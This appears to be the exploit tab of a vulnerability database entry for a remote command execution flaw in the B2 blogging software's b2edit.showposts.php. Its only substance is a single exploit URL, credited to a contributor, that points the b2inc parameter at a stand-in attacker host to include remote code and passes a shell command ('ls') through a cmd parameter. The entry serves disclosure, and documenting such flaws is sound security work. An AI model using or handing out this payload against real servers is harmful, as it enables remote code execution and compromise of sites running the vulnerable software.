• info
• discussion
• exploit
• solution
• references

B2 B2Config.PHP Remote Command Execution Vulnerability

The following example was contributed by Frank <thran60@hotmail.com>:

http://www.vulnerablehost.com/b2/b2-include/b2edit.showposts.php?b2inc=http://www.attacker.com&cmd=ls